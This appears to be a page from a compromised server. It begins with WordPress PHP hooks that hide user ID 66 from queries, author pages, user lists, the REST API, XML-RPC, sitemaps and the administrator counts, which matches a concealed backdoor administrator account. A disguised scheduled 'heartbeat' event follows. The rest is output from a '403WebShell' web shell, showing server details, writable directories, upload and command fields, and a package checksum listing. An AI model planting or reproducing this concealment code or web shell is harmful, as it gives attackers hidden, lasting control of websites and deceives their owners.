add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/net-tools.md5sums
a185f7bd40b195eeea818e47dbd9c986  bin/netstat
4515b1fa05e01b6ac40555152a8f46df  sbin/ifconfig
02a01fcad75255ac6f322fcd72c65855  sbin/ipmaddr
00a57893864ac17f859bd4edbc39e14a  sbin/iptunnel
5ab933504f1ec47e6f15ae5f28d5ce7b  sbin/mii-tool
69031f233737ccddc22bc0b35cf2fda5  sbin/nameif
b3e08ddac9179877082b6fe5964d67c9  sbin/plipconfig
79b158fb84c71d24fbc8214000222996  sbin/rarp
4f5ea5f9efa976985f0d4346207c09e0  sbin/route
8af201fbbf28ca606695a2b990d50d83  sbin/slattach
d06160c5b278997cc6f31a4775023d05  usr/sbin/arp
3ff01534c39d55d78fa6081a7c47ebb1  usr/share/doc/net-tools/README
dd083ff9a8df1d65849624a5a6e3fb31  usr/share/doc/net-tools/TODO
b1813cbf5e25daa3ba3bd30b5e3f2b09  usr/share/doc/net-tools/changelog.Debian.gz
e077bebc3273fde669bf581818eff127  usr/share/doc/net-tools/copyright
a09edab98ffa4d1a76650a24a1077656  usr/share/man/de/man5/ethers.5.gz
4be37474e6d45387cb3eaaad03fba16b  usr/share/man/de/man8/arp.8.gz
236119839d103c39b843bf8f326dfcdf  usr/share/man/de/man8/ifconfig.8.gz
22d09cd9ac1ee8b12710ee07a8f1b1c8  usr/share/man/de/man8/netstat.8.gz
82626ed30f07b575d0cf4b1a43e58192  usr/share/man/de/man8/plipconfig.8.gz
10faeb5740c00057030e62f186d492bc  usr/share/man/de/man8/rarp.8.gz
c7b77f41285848efa4aaeec6b2eb1987  usr/share/man/de/man8/route.8.gz
395b58d71c497c2959e85a7222d5081b  usr/share/man/de/man8/slattach.8.gz
1c79c92c1556a5fb10061676a500fabe  usr/share/man/fr/man5/ethers.5.gz
6b021d9c709d027d226961f0727ada3d  usr/share/man/fr/man8/arp.8.gz
3c627c636254401ed714d796ad92ea57  usr/share/man/fr/man8/ifconfig.8.gz
3809165712abc97b4522cd5aa56a40b7  usr/share/man/fr/man8/netstat.8.gz
24ce71d5f2c3f74cd27b84530185efbb  usr/share/man/fr/man8/plipconfig.8.gz
390cafe1d395a2f35991fa24480dff98  usr/share/man/fr/man8/rarp.8.gz
f548688a806a26b5b2fac8c15ae01f7f  usr/share/man/fr/man8/route.8.gz
78396710d4aa20b4dba69f55f02bbd41  usr/share/man/fr/man8/slattach.8.gz
d872dfdcd7f1ca6687b3378fa3a4d786  usr/share/man/man5/ethers.5.gz
3397bffd90b739a34b6bb6de842e90c4  usr/share/man/man8/arp.8.gz
9a64cf1eb4e2aad490f0fedeeacf9c78  usr/share/man/man8/ifconfig.8.gz
2ab062ee69c063ae94489a3ea8aafb37  usr/share/man/man8/iptunnel.8.gz
df5689f0909ccd63ab37136d88c39769  usr/share/man/man8/mii-tool.8.gz
57fcf0b82a755afb9df532ef81b0fa2e  usr/share/man/man8/nameif.8.gz
27658a46ff752c311b0f7263840ca9fa  usr/share/man/man8/netstat.8.gz
f7a4951a538d83601292c86f92c505a8  usr/share/man/man8/plipconfig.8.gz
9eeb6a9c8007679e3b23bb9abaf32571  usr/share/man/man8/rarp.8.gz
f6510754da0049c442c0f43cfb3c2ed8  usr/share/man/man8/route.8.gz
25de8ed75e84c94a679c576d1266a374  usr/share/man/man8/slattach.8.gz
cb3855d12451f09e84529e41b6894d6e  usr/share/man/pt_BR/man8/arp.8.gz
5a0e621de6feca51f633c891fc266e3b  usr/share/man/pt_BR/man8/ifconfig.8.gz
7e21b2f48399688e639c81854786f1a9  usr/share/man/pt_BR/man8/netstat.8.gz
f478c123b6718b0b3ae16db678dde704  usr/share/man/pt_BR/man8/rarp.8.gz
7d89794ff43ec8b026e14eb638fedf44  usr/share/man/pt_BR/man8/route.8.gz

Youez - 2016 - github.com/yon3zu
LinuXploit